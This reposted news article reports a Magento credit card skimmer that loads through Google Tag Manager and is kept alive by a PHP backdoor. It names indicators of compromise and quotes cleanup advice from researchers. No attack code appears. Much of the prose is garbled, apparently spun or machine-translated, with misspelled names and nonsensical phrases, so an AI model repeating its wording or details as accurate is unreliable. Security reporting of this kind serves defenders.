​​​​​​​​​​​​​​​​​         

Physical Address

304 North Cardinal St.
Dorchester Center, MA 02124

Hackers Use Google Tag Manager to Steal Credit Card Numbers


Hackers actively exploit vulnerability to inject a blurred script on the website of the e-commerce based in Magento. The malicious software is loaded through the Google Tag manager, allowing them to steal credit card numbers when buyers are delayed. The hidden PHP Backdoor is used to hold the code on the site and theft of user data.

Credit card skimmer was discovered by safety researchers in Sucura who advise that malicious software is loaded from the database table, CMS_block.content. The Google Tag Manager script (GTM) on the website looks normal because the malicious script is coded to avoid detection.

Once the malicious software has been active, it will record the credit card information from the Magento Ecommerce page and send them to an external server controlled by the hacker.

Researchers Sucuri Security also discovered a Backdoor PHP file. PHP files are the “building blocks” of many dynamic websites built on platforms such as Magento, WordPress, Drupal and Joomla. Therefore, the PHP file of malicious software, once injected, can work in the content management system.

This is a PHP file that researchers identified:

./media/index.php.

According to the consultation published on the Sucuri website:

“At the time of writing this article, we found that at least 6 websites are currently infected with this specific Google Tag ID, indicating that this threat actively affects several websites.

Eurowebmonitoroor[.]Com is used in this malicious campaign, and currently listing 15 security suppliers on Virustotal. “

Virustotal.com is a hustle and bustle protection that provides free file scan and acts as an aggregator of information.

Sukuri advises the following steps to clean the infected website:

  • “Remove any suspicious GTM tags. Log in to GTM, identify and delete any suspicious tags.
  • Perform a complete website scan to discover any other malicious software or background.
  • Remove all malicious scripts or backdoor files.
  • Ensure that Magento and all extensions are updated with security patch.
  • Regularly monitor the traffic of the place and GTM for any unusual activity. “

Read the judge’s consultation:

Google Tag Manager Skimmer Stole Credit Card data from Magento website

Sepaled image Shutterstock/SDX15



Source link

Leave a Reply

Your email address will not be published. Required fields are marked *

Trending now

Strategy Doubles Down: 21,021 Bitcoin Acquired After Record $2.5B IPO for New “Stretch” Stock
AI Powered MarTech’s Role in Automated Brand Storytelling
Party City Abruptly Closes All Stores, Lets Employees Go
IAB Challenges FTC’s New Subscription Rules In Federal Lawsuit